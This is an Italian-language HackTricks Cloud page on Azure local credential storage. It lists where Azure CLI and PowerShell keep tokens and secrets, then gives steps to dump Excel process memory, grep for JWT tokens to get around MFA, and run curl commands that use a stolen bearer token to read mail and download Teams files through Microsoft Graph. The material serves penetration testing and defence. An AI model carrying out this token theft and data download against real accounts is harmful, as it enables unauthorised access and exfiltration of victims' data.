Az - Credenziali Locali del Cloud
Reading time: 4 minutes
tip
Impara e pratica il hacking AWS: HackTricks Training AWS Red Team Expert (ARTE)
HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP:  HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure:
Impara e pratica il hacking Azure:  HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Supporta HackTricks
- Controlla i piani di abbonamento!
- Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
- Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos su github.
Archiviazione Locale dei Token e Considerazioni sulla Sicurezza
Azure CLI (Interfaccia a Riga di Comando)
I token e i dati sensibili sono archiviati localmente da Azure CLI, sollevando preoccupazioni di sicurezza:
- Token di Accesso: Archiviati in testo semplice all'interno di accessTokens.jsonsituato inC:\Users\<username>\.Azure.
- Informazioni sull'Abbonamento: azureProfile.json, nella stessa directory, contiene i dettagli dell'abbonamento.
- File di Log: La cartella ErrorRecordsall'interno di.azurepotrebbe contenere log con credenziali esposte, come:
- Comandi eseguiti con credenziali incorporate.
- URL accessibili utilizzando token, che potrebbero rivelare informazioni sensibili.
Azure PowerShell
Azure PowerShell archivia anche token e dati sensibili, che possono essere accessibili localmente:
- Token di Accesso: TokenCache.dat, situato inC:\Users\<username>\.Azure, archivia i token di accesso in testo semplice.
- Segreti del Principale di Servizio: Questi sono archiviati non crittografati in AzureRmContext.json.
- Funzione di Salvataggio del Token: Gli utenti hanno la possibilità di persistere i token utilizzando il comando Save-AzContext, che dovrebbe essere usato con cautela per prevenire accessi non autorizzati.
Strumenti Automatici per Trovarli
Token in Memoria
Come spiegato in questo video, alcuni software Microsoft sincronizzati con il cloud (Excel, Teams...) potrebbero archiviare token di accesso in chiaro nella memoria. Quindi, semplicemente dumpando la memoria del processo e greppando per token JWT potrebbe concederti accesso a diverse risorse della vittima nel cloud bypassando MFA.
Passaggi:
- Dumpa i processi di excel sincronizzati con l'utente EntraID con il tuo strumento preferito.
- Esegui: string excel.dmp | grep 'eyJ0'e trova diversi token nell'output.
- Trova i token che ti interessano di più e esegui strumenti su di essi:
# Check the identity of the token
curl -s -H "Authorization: Bearer <token>" https://graph.microsoft.com/v1.0/me | jq
# Check the email (you need a token authorized in login.microsoftonline.com)
curl -s -H "Authorization: Bearer <token>" https://outlook.office.com/api/v2.0/me/messages | jq
# Download a file from Teams
## You need a token that can access graph.microsoft.com
## Then, find the <site_id> inside the memory and call
curl -s -H "Authorization: Bearer <token>" https://graph.microsoft.com/v1.0/sites/<site_id>/drives | jq
## Then, list one drive
curl -s -H "Authorization: Bearer <token>" 'https://graph.microsoft.com/v1.0/sites/<site_id>/drives/<drive_id>' | jq
## Finally, download a file from that drive:
curl -o <filename_output> -L -H "Authorization: Bearer <token>" '<@microsoft.graph.downloadUrl>'
Nota che questi tipi di token di accesso possono essere trovati anche all'interno di altri processi.
tip
Impara e pratica il hacking AWS: HackTricks Training AWS Red Team Expert (ARTE)
HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP:  HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure:
Impara e pratica il hacking Azure:  HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Supporta HackTricks
- Controlla i piani di abbonamento!
- Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
- Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos su github.
 HackTricks Cloud
HackTricks Cloud